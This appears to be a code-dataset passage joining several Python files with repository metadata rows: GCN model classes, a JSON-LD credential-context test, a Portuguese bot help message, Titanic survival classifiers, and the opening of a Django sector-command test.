class GCN_8_8_16_16_32_32_48_48_64(torch.nn.Module):
    """GCN stack 8-8-16-16-32-32-48-48-64, then a two-layer MLP head over the
    flattened node features (fc1 assumes a fixed flattened size of 1536 —
    TODO confirm). Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)
        self.conv6 = GCNConv(32, 32)
        self.conv7 = GCNConv(32, 48)
        self.conv8 = GCNConv(48, 48)
        self.conv9 = GCNConv(48, 64)
        self.fc1 = torch.nn.Linear(1536, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4, self.conv5,
                  self.conv6, self.conv7, self.conv8, self.conv9)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
class GCN_8_8_16_16_32_32_48_48_64_64(torch.nn.Module):
    """GCN stack 8-8-16-16-32-32-48-48-64-64, then a two-layer MLP head over
    the flattened node features (fc1 assumes a fixed flattened size of 1536 —
    TODO confirm). Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)
        self.conv6 = GCNConv(32, 32)
        self.conv7 = GCNConv(32, 48)
        self.conv8 = GCNConv(48, 48)
        self.conv9 = GCNConv(48, 64)
        self.conv10 = GCNConv(64, 64)
        self.fc1 = torch.nn.Linear(1536, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4, self.conv5,
                  self.conv6, self.conv7, self.conv8, self.conv9, self.conv10)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
class GCN_4_4_8_8_16_16_32(torch.nn.Module):
    """GCN stack 4-4-8-8-16-16-32, then a two-layer MLP head over the
    flattened node features (fc1 assumes a fixed flattened size of 768 —
    TODO confirm). Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 4)
        self.conv2 = GCNConv(4, 4)
        self.conv3 = GCNConv(4, 8)
        self.conv4 = GCNConv(8, 8)
        self.conv5 = GCNConv(8, 16)
        self.conv6 = GCNConv(16, 16)
        self.conv7 = GCNConv(16, 32)
        self.fc1 = torch.nn.Linear(768, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4,
                  self.conv5, self.conv6, self.conv7)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
class GCN_8bn_8bn_16bn_16bn_32bn(torch.nn.Module):
    """Batch-norm variant of GCN_8_8_16_16_32: each GCN layer is followed by
    BatchNorm1d and ReLU (fc1 assumes a fixed flattened size of 768 — TODO
    confirm). Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv1_bn = nn.BatchNorm1d(8)
        self.conv2 = GCNConv(8, 8)
        self.conv2_bn = nn.BatchNorm1d(8)
        self.conv3 = GCNConv(8, 16)
        self.conv3_bn = nn.BatchNorm1d(16)
        self.conv4 = GCNConv(16, 16)
        self.conv4_bn = nn.BatchNorm1d(16)
        self.conv5 = GCNConv(16, 32)
        self.conv5_bn = nn.BatchNorm1d(32)
        self.fc1 = torch.nn.Linear(768, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        pairs = (
            (self.conv1, self.conv1_bn),
            (self.conv2, self.conv2_bn),
            (self.conv3, self.conv3_bn),
            (self.conv4, self.conv4_bn),
            (self.conv5, self.conv5_bn),
        )
        for conv, bn in pairs:
            data.x = F.relu(bn(conv(data.x, data.edge_index)))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
| 34.368948 | 75 | 0.602273 | 3,267 | 20,587 | 3.665442 | 0.030915 | 0.162422 | 0.061127 | 0.103132 | 0.951649 | 0.935699 | 0.933027 | 0.924342 | 0.924342 | 0.923674 | 0 | 0.061872 | 0.240832 | 20,587 | 598 | 76 | 34.426421 | 0.704332 | 0.006266 | 0 | 0.870044 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090308 | false | 0 | 0.019824 | 0 | 0.200441 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56573fbde592ae6faff635808ad15def68519f49 | 7,830 | py | Python | aries_cloudagent/vc/ld_proofs/tests/test_check.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 247 | 2019-07-02T21:10:21.000Z | 2022-03-30T13:55:33.000Z | aries_cloudagent/vc/ld_proofs/tests/test_check.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 1,462 | 2019-07-02T20:57:30.000Z | 2022-03-31T23:13:35.000Z | aries_cloudagent/vc/ld_proofs/tests/test_check.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 377 | 2019-06-20T21:01:31.000Z | 2022-03-30T08:27:53.000Z | from asynctest import TestCase
from ..check import get_properties_without_context
from ...tests.document_loader import custom_document_loader
VALID_INPUT_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/citizenship/v1",
"https://w3id.org/security/bbs/v1",
],
"id": "https://issuer.oidp.uscis.gov/credentials/83627465",
"type": ["PermanentResidentCard", "VerifiableCredential"],
"description": "Government of Example Permanent Resident Card.",
"identifier": "83627465",
"name": "Permanent Resident Card",
"credentialSubject": {
"id": "did:example:b34ca6cd37bbf23",
"type": ["Person", "PermanentResident"],
"familyName": "SMITH",
"gender": "Male",
"givenName": "JOHN",
},
"expirationDate": "2029-12-03T12:19:52Z",
"issuanceDate": "2019-12-03T12:19:52Z",
"issuer": "did:example:489398593",
"proof": {
"type": "BbsBlsSignatureProof2020",
"nonce": "wrmPiSRm+iBqnGBXz+/37LLYRZWirGgIORKHIkrgWVnHtb4fDe/4ZPZaZ+/RwGVJYYY=",
"proofValue": "ABkB/wbvt6213E9eJ+aRGbdG1IIQtx+IdAXALLNg2a5ENSGOIBxRGSoArKXwD/diieDWG6+0q8CWh7CViUqOOdEhYp/DonzmjoWbWECalE6x/qtyBeE7W9TJTXyK/yW6JKSKPz2ht4J0XLV84DZrxMF4HMrY7rFHvdE4xV7ULeC9vNmAmwYAqJfNwY94FG2erg2K2cg0AAAAdLfutjMuBO0JnrlRW6O6TheATv0xZZHP9kf1AYqPaxsYg0bq2XYzkp+tzMBq1rH3tgAAAAIDTzuPazvFHijdzuAgYg+Sg0ziF+Gw5Bz8r2cuvuSg1yKWqW1dM5GhGn6SZUpczTXuZuKGlo4cZrwbIg9wf4lBs3kQwWULRtQUXki9izmznt4Go98X/ElOguLLum4S78Gehe1ql6CXD1zS5PiDXjDzAAAACWz/sbigWpPmUqNA8YUczOuzBUvzmkpjVyL9aqf1e7rSZmN8CNa6dTGOzgKYgDGoIbSQR8EN8Ld7kpTIAdi4YvNZwEYlda/BR6oSrFCquafz7s/jeXyOYMsiVC53Zls9KEg64tG7n90XuZOyMk9RAdcxYRGligbFuG2Ap+rQ+rrELJaW7DWwFEI6cRnitZo6aS0hHmiOKKtJyA7KFbx27nBGd2y3JCvgYO6VUROQ//t3F4aRVI1U53e5N3MU+lt9GmFeL+Kv+2zV1WssScO0ZImDGDOvjDs1shnNSjIJ0RBNAo2YzhFKh3ExWd9WbiZ2/USSyomaSK4EzdTDqi2JCGdqS7IpooKSX/1Dp4K+d8HhPLGNLX4yfMoG9SnRfRQZZQ==",
"verificationMethod": "did:example:489398593#test",
"proofPurpose": "assertionMethod",
"created": "2020-10-16T23:59:31Z",
},
}
INVALID_INPUT_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/citizenship/v1",
],
"id": "https://issuer.oidp.uscis.gov/credentials/83627465",
"type": ["PermanentResidentCard", "VerifiableCredential"],
"description": "Government of Example Permanent Resident Card.",
"identifier": "83627465",
"name": "Permanent Resident Card",
"credentialSubject": [
{
"id": "did:example:b34ca6cd37bbf23",
"type": ["Person", "PermanentResident"],
"familyName": "SMITH",
"gender": "Male",
"givenName": "JOHN",
},
{
"some_random": "value",
},
],
"expirationDate": "2029-12-03T12:19:52Z",
"issuanceDate": "2019-12-03T12:19:52Z",
"issuer": "did:example:489398593",
"proof": {
"type": "BbsBlsSignatureProof2020",
"nonce": "wrmPiSRm+iBqnGBXz+/37LLYRZWirGgIORKHIkrgWVnHtb4fDe/4ZPZaZ+/RwGVJYYY=",
"proofValue": "ABkB/wbvt6213E9eJ+aRGbdG1IIQtx+IdAXALLNg2a5ENSGOIBxRGSoArKXwD/diieDWG6+0q8CWh7CViUqOOdEhYp/DonzmjoWbWECalE6x/qtyBeE7W9TJTXyK/yW6JKSKPz2ht4J0XLV84DZrxMF4HMrY7rFHvdE4xV7ULeC9vNmAmwYAqJfNwY94FG2erg2K2cg0AAAAdLfutjMuBO0JnrlRW6O6TheATv0xZZHP9kf1AYqPaxsYg0bq2XYzkp+tzMBq1rH3tgAAAAIDTzuPazvFHijdzuAgYg+Sg0ziF+Gw5Bz8r2cuvuSg1yKWqW1dM5GhGn6SZUpczTXuZuKGlo4cZrwbIg9wf4lBs3kQwWULRtQUXki9izmznt4Go98X/ElOguLLum4S78Gehe1ql6CXD1zS5PiDXjDzAAAACWz/sbigWpPmUqNA8YUczOuzBUvzmkpjVyL9aqf1e7rSZmN8CNa6dTGOzgKYgDGoIbSQR8EN8Ld7kpTIAdi4YvNZwEYlda/BR6oSrFCquafz7s/jeXyOYMsiVC53Zls9KEg64tG7n90XuZOyMk9RAdcxYRGligbFuG2Ap+rQ+rrELJaW7DWwFEI6cRnitZo6aS0hHmiOKKtJyA7KFbx27nBGd2y3JCvgYO6VUROQ//t3F4aRVI1U53e5N3MU+lt9GmFeL+Kv+2zV1WssScO0ZImDGDOvjDs1shnNSjIJ0RBNAo2YzhFKh3ExWd9WbiZ2/USSyomaSK4EzdTDqi2JCGdqS7IpooKSX/1Dp4K+d8HhPLGNLX4yfMoG9SnRfRQZZQ==",
"verificationMethod": "did:example:489398593#test",
"proofPurpose": "assertionMethod",
"created": "2020-10-16T23:59:31Z",
},
}
VALID_VACCINATION_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/security/bbs/v1",
"https://w3id.org/vaccination/v1",
],
"type": ["VerifiableCredential", "VaccinationCertificate"],
"issuer": "replace_me",
"id": "urn:uvci:af5vshde843jf831j128fj",
"name": "COVID-19 Vaccination Certificate",
"description": "COVID-19 Vaccination Certificate",
"issuanceDate": "2019-12-03T12:19:52Z",
"expirationDate": "2029-12-03T12:19:52Z",
"credentialSubject": {
"type": "VaccinationEvent",
"batchNumber": "1183738569",
"administeringCentre": "MoH",
"healthProfessional": "MoH",
"countryOfVaccination": "NZ",
"recipient": {
"type": "VaccineRecipient",
"givenName": "JOHN",
"familyName": "SMITH",
"gender": "Male",
"birthDate": "1958-07-17",
},
"vaccine": {
"type": "Vaccine",
"disease": "COVID-19",
"atcCode": "J07BX03",
"medicinalProductName": "COVID-19 Vaccine Moderna",
"marketingAuthorizationHolder": "Moderna Biotech",
},
},
}
INVALID_VACCINATION_DOC = {
"@context": [
"https://www.w3.org/2018/credentials/v1",
"https://w3id.org/security/bbs/v1",
"https://w3id.org/vaccination/v1",
],
"type": ["VerifiableCredential", "VaccinationCertificate"],
"issuer": "replace_me",
"id": "urn:uvci:af5vshde843jf831j128fj",
"name": "COVID-19 Vaccination Certificate",
"description": "COVID-19 Vaccination Certificate",
"issuanceDate": "2019-12-03T12:19:52Z",
"expirationDate": "2029-12-03T12:19:52Z",
"credentialSubject": {
"type": "VaccinationEvent",
"batchNumber": "1183738569",
"administeringCentre": "MoH",
"healthProfessional": "MoH",
"countryOfVaccination": "NZ",
"recipient": {
"type": "VaccineRecipient",
"givenName": "JOHN",
"familyName": "SMITH",
"gender": "Male",
"birthDate": "1958-07-17",
"nonExistent": "hello",
},
"vaccine": {
"type": "Vaccine",
"disease": "COVID-19",
"atcCode": "J07BX03",
"medicinalProductName": "COVID-19 Vaccine Moderna",
"marketingAuthorizationHolder": "Moderna Biotech",
"nonExistent": {"hello": "goodbye"},
},
},
}
class TestCheck(TestCase):
    """Tests for get_properties_without_context (JSON-LD context coverage)."""

    def test_get_properties_without_context_valid(self):
        # Every property of the valid credential is covered by its contexts.
        assert (
            get_properties_without_context(VALID_INPUT_DOC, custom_document_loader)
            == []
        )

    def test_get_properties_without_context_invalid(self):
        # document has extra property some_random and
        # is missing the bbs context
        assert get_properties_without_context(
            INVALID_INPUT_DOC, custom_document_loader
        ) == [
            "credentialSubject[1].some_random",
            "proof.nonce",
            "proof.proofValue",
            "proof.verificationMethod",
            "proof.proofPurpose",
            "proof.created",
        ]

    def test_get_properties_without_context_vaccination_valid(self):
        # The vaccination credential's contexts cover all of its properties.
        assert (
            get_properties_without_context(
                VALID_VACCINATION_DOC, custom_document_loader
            )
            == []
        )

    def test_get_properties_without_context_vaccination_invalid(self):
        # Both injected "nonExistent" properties are reported as uncovered.
        assert get_properties_without_context(
            INVALID_VACCINATION_DOC, custom_document_loader
        ) == [
            "credentialSubject.recipient.nonExistent",
            "credentialSubject.vaccine.nonExistent",
        ]
| 42.554348 | 841 | 0.6659 | 570 | 7,830 | 9.026316 | 0.280702 | 0.022741 | 0.034985 | 0.04723 | 0.916229 | 0.8931 | 0.870165 | 0.854811 | 0.83654 | 0.83654 | 0 | 0.096593 | 0.205364 | 7,830 | 183 | 842 | 42.786885 | 0.730312 | 0.00894 | 0 | 0.7 | 0 | 0.011765 | 0.603455 | 0.296506 | 0 | 0 | 0 | 0 | 0.035294 | 1 | 0.023529 | false | 0 | 0.017647 | 0 | 0.047059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b149c109e2a6bf848f0490ea5afaa36c4042a2e | 1,070 | py | Python | comandos.py | devgiordane/GioBot | b4f255d4a5abfe6f0c89286968372d97683679a9 | [
"MIT"
] | 4 | 2020-05-22T06:41:05.000Z | 2020-05-27T00:01:36.000Z | comandos.py | devgiordane/GioBot | b4f255d4a5abfe6f0c89286968372d97683679a9 | [
"MIT"
] | null | null | null | comandos.py | devgiordane/GioBot | b4f255d4a5abfe6f0c89286968372d97683679a9 | [
"MIT"
] | 3 | 2020-05-22T03:27:34.000Z | 2020-06-13T18:39:05.000Z | def listaComandos():
c = f"Oi, precisa de ajuda? eu respondo a esses comandos:\n/git - 💻 Envie seu username do github e veja suas informações publicas. \n/discord - 💬 Participe do nosso grupo no discord\n/pedra - ✊ Jogue contra mim e tente me vencer!\n/papel - ✋ Jogue contra mim e tente me vencer!\n/tesoura - ✌️ Jogue contra mim e tente me vencer!\n/goat - 🐐 Uma foto aleatória de um bode\n/cat - 🐱 Uma foto aleatória de um gato\n/dog - 🐶 Uma foto aleatória de um cachorro\n/fox - 🦊 Uma foto aleatória de uma raposa\n/pokemon - 🐉 Uma foto aleatória de um Pokémon"
return c
"""
/git - 💻 Envie seu username do github e veja suas informações publicas.
/discord - 💬 Participe do nosso grupo no discord
/pedra - ✊🏻 Jogue contra mim e tente me vencer!
/papel - ✋🏻 Jogue contra mim e tente me vencer!
/tesoura - ✌🏻 Jogue contra mim e tente me vencer!
/goat - 🐐 Uma foto aleatória de um bode
/cat - 🐱 Uma foto aleatória de um gato
/dog - 🐶 Uma foto aleatória de um cachorro
/fox - 🦊 Uma foto aleatória de uma raposa
/pokemon - 🐉 Uma foto aleatória de um Pokémon
""" | 62.941176 | 548 | 0.711215 | 199 | 1,070 | 3.944724 | 0.336683 | 0.089172 | 0.203822 | 0.229299 | 0.852229 | 0.852229 | 0.852229 | 0.745223 | 0.142675 | 0.142675 | 0 | 0 | 0.198131 | 1,070 | 17 | 549 | 62.941176 | 0.886946 | 0 | 0 | 0 | 0 | 0.333333 | 0.916382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3b2092b5d5a0abbea6fa1f865e4e5200222a2fc8 | 10,175 | py | Python | src/classifiers.py | JakeCowton/titanic | 0cce675e082b5f9f830e80c47d1f84857907ad06 | [
"MIT"
] | 1 | 2019-05-31T02:10:59.000Z | 2019-05-31T02:10:59.000Z | src/classifiers.py | JakeCowton/titanic | 0cce675e082b5f9f830e80c47d1f84857907ad06 | [
"MIT"
] | null | null | null | src/classifiers.py | JakeCowton/titanic | 0cce675e082b5f9f830e80c47d1f84857907ad06 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.ensemble import RandomForestClassifier
from utils import write_results, get_training_data,\
get_evaluation_data, get_testing_data,\
get_all_training_data, normalise_data
from evaluation import EvaluationMetrics
from slp import create_slp
from nn_manager import create_nn, call_nn
from ga_for_mlp import MLPFeatureSelector
from ga_for_rfc import RFCFeatureSelector
from ga_for_svm import SVMFeatureSelector
from sklearn import svm
K_FOLDS = 10
def random_forest():
    """K-fold train/eval of a RandomForestClassifier; writes test predictions.

    Returns the list of per-fold F1 scores. The model fitted on the last fold
    produces the test-set predictions written to rand_forest_entropy.csv.
    """
    test_df = get_testing_data()
    ids = test_df.PassengerId.values
    # Drop all but class
    test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
                           axis=1)
    test_data = normalise_data(test_df).values
    f_scores = []
    for i in range(K_FOLDS):
        train_df = get_training_data(fold=i)
        eval_df = get_evaluation_data(fold=i)
        expected_training_outputs = train_df.Survived.values
        train_df = train_df.drop(["PassengerId", "Survived",
                                  "Ticket", "Cabin"],
                                 axis=1)
        expected_eval_outputs = eval_df.Survived.values
        eval_df = eval_df.drop(["PassengerId", "Survived",
                                "Ticket", "Cabin"],
                               axis=1)
        train_data = normalise_data(train_df).values
        eval_data = normalise_data(eval_df).values
        forest = RandomForestClassifier(n_estimators=200,
                                        n_jobs=-1,
                                        criterion="entropy")
        forest = forest.fit(train_data, expected_training_outputs)
        evaluation = forest.predict(eval_data)
        em = EvaluationMetrics(evaluation, expected_eval_outputs)
        f1 = em.calculate_f1()
        f_scores.append(f1)
    # Predict on the held-out test set using the last fold's model.
    output = forest.predict(test_data)
    write_results("rand_forest_entropy.csv", ids, output)
    return f_scores
def slp():
    """K-fold train/eval of a single-layer perceptron; writes test predictions.

    Returns the list of per-fold F1 scores; the last fold's perceptron
    produces the predictions written to slp.csv.
    """
    test_df = get_testing_data()
    ids = test_df.PassengerId.values
    test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
                           axis=1)
    test_data = normalise_data(test_df).values
    f_scores = []
    for i in range(K_FOLDS):
        train_df = get_training_data(fold=i)
        eval_df = get_evaluation_data(fold=i)
        expected_training_outputs = train_df.Survived.values
        train_df = train_df.drop(["PassengerId", "Survived",
                                  "Ticket", "Cabin"],
                                 axis=1)
        expected_eval_outputs = eval_df.Survived.values
        eval_df = eval_df.drop(["PassengerId", "Survived",
                                "Ticket", "Cabin"],
                               axis=1)
        train_data = normalise_data(train_df).values
        eval_data = normalise_data(eval_df).values
        perceptron = create_slp(train_data, expected_training_outputs)
        evaluation = []
        for sample in eval_data:
            evaluation.append(perceptron.recall(sample))
        em = EvaluationMetrics(evaluation, expected_eval_outputs)
        f1 = em.calculate_f1()
        f_scores.append(f1)
    output = []
    for sample in test_data:
        output.append(perceptron.recall(sample))
    write_results("slp.csv", ids, output)
    return f_scores
def mlp():
    """K-fold train/eval of an MLP; writes test predictions to mlp.csv.

    Returns the list of per-fold F1 scores.
    """
    test_df = get_testing_data()
    ids = test_df.PassengerId.values
    test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
                           axis=1)
    test_data = normalise_data(test_df).values
    f_scores = []
    for i in range(K_FOLDS):
        train_df = get_training_data(fold=i)
        eval_df = get_evaluation_data(fold=i)
        expected_training_outputs = train_df.Survived.values
        train_df = train_df.drop(["PassengerId", "Survived",
                                  "Ticket", "Cabin"],
                                 axis=1)
        expected_eval_outputs = eval_df.Survived.values
        eval_df = eval_df.drop(["PassengerId", "Survived",
                                "Ticket", "Cabin"],
                               axis=1)
        train_data = normalise_data(train_df).values
        eval_data = normalise_data(eval_df).values
        no_of_inputs = len(train_data[0])
        no_of_samples = len(train_data)
        # Pack inputs/outputs into a structured array for create_nn.
        data = np.zeros(no_of_samples, dtype=[('inputs', float, no_of_inputs),
                                              ('outputs', float, 1)])
        # NOTE(review): this inner loop variable shadows the fold index `i`.
        for i in range(len(train_data)):
            data[i]['inputs'] = train_data[i]
            data[i]['outputs'] = expected_training_outputs[i]
        nn = create_nn(data, (no_of_inputs, 3, 1))
        evaluation = []
        for sample in eval_data:
            # NOTE(review): sample[0] passes only the first element of each
            # row to call_nn — confirm this matches call_nn's expected input.
            out = call_nn(nn, sample[0])
            # Threshold the network's output at 0.5 to get a class label.
            if out >= 0.5:
                evaluation.append(1)
            else:
                evaluation.append(0)
        em = EvaluationMetrics(evaluation, expected_eval_outputs)
        f1 = em.calculate_f1()
        f_scores.append(f1)
    output = []
    for sample in test_data:
        out = call_nn(nn, sample[0])
        if out >= 0.5:
            output.append(1)
        else:
            output.append(0)
    write_results("mlp.csv", ids, output)
    return f_scores
def sk_svm():
    """K-fold train/eval of sklearn's LinearSVC; writes test predictions.

    Returns the list of per-fold F1 scores; the last fold's model produces
    the predictions written to svm.csv.
    """
    test_df = get_testing_data()
    ids = test_df.PassengerId.values
    test_df = test_df.drop(["PassengerId", "Ticket", "Cabin",],
                           axis=1)
    test_data = normalise_data(test_df).values
    f_scores = []
    for i in range(K_FOLDS):
        train_df = get_training_data(fold=i)
        eval_df = get_evaluation_data(fold=i)
        expected_training_outputs = train_df.Survived.values
        train_df = train_df.drop(["PassengerId", "Survived",
                                  "Ticket", "Cabin"],
                                 axis=1)
        expected_eval_outputs = eval_df.Survived.values
        eval_df = eval_df.drop(["PassengerId", "Survived",
                                "Ticket", "Cabin"],
                               axis=1)
        train_data = normalise_data(train_df).values
        eval_data = normalise_data(eval_df).values
        clf = svm.LinearSVC()
        clf.fit(train_data, expected_training_outputs)
        evaluation = clf.predict(eval_data)
        em = EvaluationMetrics(evaluation, expected_eval_outputs)
        f1 = em.calculate_f1()
        f_scores.append(f1)
    output = clf.predict(test_data)
    write_results("svm.csv", ids, output)
    return f_scores
def ga_rfc():
    """GA feature selection + RandomForest over K folds; writes ga_rfc.csv.

    Returns the list of per-fold F1 scores.
    """
    test_df = get_testing_data()
    ids = test_df.PassengerId.values
    # Select a feature subset with the genetic algorithm before training.
    ga = RFCFeatureSelector()
    features = ga.calculate()
    print "RFC features:"
    print features
    test_data = ga.massage_data_without_outputs(test_df, features)
    f_scores = []
    for i in range(K_FOLDS):
        train_df = get_training_data(fold=i)
        eval_df = get_evaluation_data(fold=i)
        expected_training_outputs = train_df.Survived.values
        train_data = ga.massage_data_with_outputs(train_df, features)
        expected_eval_outputs = eval_df.Survived.values
        eval_data = ga.massage_data_with_outputs(eval_df, features)
        no_of_inputs = features.count(1)  # NOTE(review): unused here
        forest = RandomForestClassifier(n_estimators=1000,
                                        n_jobs=-1,
                                        criterion="entropy")
        forest = forest.fit(train_data, expected_training_outputs)
        evaluation = forest.predict(eval_data)
        em = EvaluationMetrics(evaluation, expected_eval_outputs)
        f1 = em.calculate_f1()
        f_scores.append(f1)
    output = forest.predict(test_data)
    write_results("ga_rfc.csv", ids, output)
    return f_scores
def ga_mlp():
    """GA feature selection + MLP over K folds; writes ga_mlp.csv.

    Returns the list of per-fold F1 scores.
    """
    test_df = get_testing_data()
    ids = test_df.PassengerId.values
    # Select a feature subset with the genetic algorithm before training.
    ga = MLPFeatureSelector()
    features = ga.calculate()
    print "MLP features:"
    print features
    test_data = ga.massage_data_without_outputs(test_df, features)
    f_scores = []
    for i in range(K_FOLDS):
        train_df = get_training_data(fold=i)
        eval_df = get_evaluation_data(fold=i)
        expected_training_outputs = train_df.Survived.values
        train_data = ga.massage_data_with_outputs(train_df, features)
        expected_eval_outputs = eval_df.Survived.values
        eval_data = ga.massage_data_with_outputs(eval_df, features)
        # Network input width = number of selected features.
        no_of_inputs = features.count(1)
        nn = create_nn(train_data, (no_of_inputs, 10, 1))
        evaluation = []
        for sample in eval_data:
            out = call_nn(nn, sample[0])
            # Threshold the network's output at 0.5 to get a class label.
            if out >= 0.5:
                evaluation.append(1)
            else:
                evaluation.append(0)
        em = EvaluationMetrics(evaluation, expected_eval_outputs)
        f1 = em.calculate_f1()
        f_scores.append(f1)
    output = []
    for sample in test_data:
        out = call_nn(nn, sample[0])
        if out >= 0.5:
            output.append(1)
        else:
            output.append(0)
    write_results("ga_mlp.csv", ids, output)
    return f_scores
def ga_svm():
test_df = get_testing_data()
ids = test_df.PassengerId.values
ga = SVMFeatureSelector()
features = ga.calculate()
print "SVM features:"
print features
test_data = ga.massage_data_without_outputs(test_df, features)
f_scores = []
for i in range(K_FOLDS):
train_df = get_training_data(fold=i)
eval_df = get_evaluation_data(fold=i)
expected_training_outputs = train_df.Survived.values
train_data = ga.massage_data_with_outputs(train_df, features)
expected_eval_outputs = eval_df.Survived.values
eval_data = ga.massage_data_with_outputs(eval_df, features)
no_of_inputs = features.count(1)
clf = svm.SVC()
clf = clf.fit(train_data, expected_training_outputs)
evaluation = clf.predict(eval_data)
em = EvaluationMetrics(evaluation, expected_eval_outputs)
f1 = em.calculate_f1()
f_scores.append(f1)
output = clf.predict(test_data)
write_results("ga_rfc.csv", ids, output)
return f_scores
| 29.154728 | 78 | 0.604324 | 1,218 | 10,175 | 4.744663 | 0.086207 | 0.030109 | 0.021803 | 0.033224 | 0.818308 | 0.818308 | 0.807752 | 0.798062 | 0.780931 | 0.780931 | 0 | 0.010415 | 0.30172 | 10,175 | 348 | 79 | 29.238506 | 0.802956 | 0.001769 | 0 | 0.798354 | 0 | 0 | 0.047366 | 0.002265 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.078189 | 0.041152 | null | null | 0.024691 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
8e5bbf568303ea7b7dcb1dac7fd1c56008dab0c8 | 13,236 | py | Python | datahub/dbmaintenance/test/commands/test_create_sector.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 6 | 2019-12-02T16:11:24.000Z | 2022-03-18T10:02:02.000Z | datahub/dbmaintenance/test/commands/test_create_sector.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 1,696 | 2019-10-31T14:08:37.000Z | 2022-03-29T12:35:57.000Z | datahub/dbmaintenance/test/commands/test_create_sector.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 9 | 2019-11-22T12:42:03.000Z | 2021-09-03T14:25:05.000Z | from io import BytesIO
import factory
import pytest
from django.core.management import call_command
from reversion.models import Version
from datahub.metadata.models import Sector
from datahub.metadata.test.factories import SectorClusterFactory, SectorFactory
pytestmark = pytest.mark.django_db
def test_happy_path(s3_stubber):
    """Test that the command creates the specified records."""
    pks = [
        '00000000-0000-0000-0000-000000000001',
        '00000000-0000-0000-0000-000000000002',
        '00000000-0000-0000-0000-000000000003',
    ]
    segments = ['segment_1', 'segment_2', 'segment_3']
    clusters = SectorClusterFactory.create_batch(
